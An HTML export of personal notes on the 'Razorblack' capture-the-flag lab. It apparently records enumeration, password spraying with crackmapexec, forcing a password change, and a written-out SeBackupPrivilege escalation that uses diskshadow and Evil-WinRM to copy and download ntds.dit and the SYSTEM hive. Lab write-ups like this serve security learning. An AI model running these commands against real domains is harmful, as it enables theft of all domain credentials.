<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../../../style.css">
    <base target="_parent">
    <title data-trilium-title>Razorblack</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>Razorblack</h1>

      <div class="ck-content">
        <p>Enum4linux gave a domain name(tried different tld dunno how forgot thm)
          <br
          />Nfs share on 2049 gives steven's flag
          <br />also got a list of usernames from xlsx file</p>
        <p>administrator@raz0rblack.thm
          <br />twilliams@raz0rblack.thm:roastpotatoes</p>
        <p>lvetrova@raz0rblack.thm
          <br />sbradley@raz0rblack.thm</p>
        <p>pre-auth doesn't give any other hashes
          <br />need to look closer on nmap ports 
          <br />smbclient -U 'twilliams%roastpotatoes' -L //10.10.157.225 gives smb shares</p>
        <p><code>smbclient -U 'twilliams%roastpotatoes'  \\\\10.10.182.10\\SYSVOL</code> gives
          useful data, can't believe I missed it!
          <br /> </p>
        <p>C:\Windows\trash</p>
        <p>
          <br />Mode                LastWriteTime         Length Name
          <br />----                -------------         ------ ----
          <br />-a----        3/15/2021  11:02 PM       18927164 experiment_gone_wrong.zip
          <br
          /> </p>
        <p><a href="https://linuxcommandlibrary.com/man/evil-winrm">https://linuxcommandlibrary.com/man/evil-winrm</a> </p>
        <p>Writeup:</p><pre><code class="language-text-plain">crackmapexec smb $IP -u users.txt -p pass.txt
SMB         10.10.25.33    445    HAVEN-DC         [-] raz0rblack.thm\sbradley:roastpotatoes STATUS_PASSWORD_MUST_CHANGE
smbpasswd -r $IP -U sbradley</code></pre>

        <p>For the user <code>sbradley</code> we find an interesting message <code>STATUS_PASSWORD_MUST_CHANGE</code> The
          cause of the message is that The specified password expired. So Let's change
          the password.</p>
        <p>Now we have the read access to <code>trash</code>

        </p>
        <p><code>crackmapexec smb $IP -u lvetrova -H hashes3.txt</code> where hashes3.txt
          has all the dumped passwords(strange I couldn't find one manually, but
          this works?)</p>
        <p>hashes3.txt has to be a lost of line by line hashes(use a llittle <code>tr</code> and <code>awk</code> magic
          ) </p>
         <h2>Privilege Escalation:</h2>

        <p>see available privileges with <code>whoami /priv</code>, we have an interesting
          privliege:<code>SeBackupPrivilege</code> </p>
        <p>It was designed for allowing users to create backup copies of the system.
          This privilege allows the user to read any file on the entirety of the
          files that might also include some sensitive files such as the <strong>SAM file or SYSTEM Registry file</strong>.</p>
        <p>Before using this exploit we need to Dump the Domain Credentials to a
          file. For this, we will use <a href="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#using-diskshadow-a-windows-signed-binary"><strong>DiskShadow (a Windows signed binary)</strong></a><strong>.</strong>

        </p>
        <p>Prepare the <code>diskshadow.txt,</code> execute the <code>diskshadow.exe</code>

        </p><pre><code class="language-text-plain">set metadata C:\tmp\tmp.cabs 
set context persistent nowriters 
add volume c: alias someAlias 
create 
expose %someAlias% h:</code></pre>

        <p><code>*Evil-WinRM* PS C:\Users\xyan1d3&gt; mkdir C:\tmp </code>

          <br /><code>*Evil-WinRM* PS C:\tmp&gt; upload diskshadow.txt</code>

        </p>
        <p><code>diskshadow.exe /s c:\tmp\diskshadow.txt</code>

        </p>
        <p>we need few <code>dll</code> files which we can download from <a href="https://github.com/giuliano108/SeBackupPrivilege"><strong>here</strong></a>.
          After downloading we need to execute it in the following way and then download
          the hashes.</p><pre><code class="language-text-plain">*Evil-WinRM* PS C:\tmp&gt; upload SeBackupPrivilegeUtils.dll

*Evil-WinRM* PS C:\tmp&gt; upload SeBackupPrivilegeCmdLets.dll

*Evil-WinRM* PS C:\tmp&gt; import-module .\SeBackupPrivilegeUtils.dll

*Evil-WinRM* PS C:\tmp&gt; import-module .\SeBackupPrivilegeCmdLets.dll

*Evil-WinRM* PS C:\tmp&gt; copy-filesebackupprivilege h:\windows\ntds\ntds.dit C:\tmp\ntds.dit -overwrite

*Evil-WinRM* PS C:\tmp&gt; reg save HKLM\SYSTEM C:\tmp\system

*Evil-WinRM* PS C:\tmp&gt; download ntds.dit

*Evil-WinRM* PS C:\tmp&gt; download system</code></pre>

        <p> </p>
        <p> </p>
        <p> </p>
        <p> </p>
        <p> </p>
        <p> </p>
        <p> </p>
        <p> </p>
        <p> </p>
        <p> </p>
        <p> </p>
      </div>
    </div>
  </body>

</html>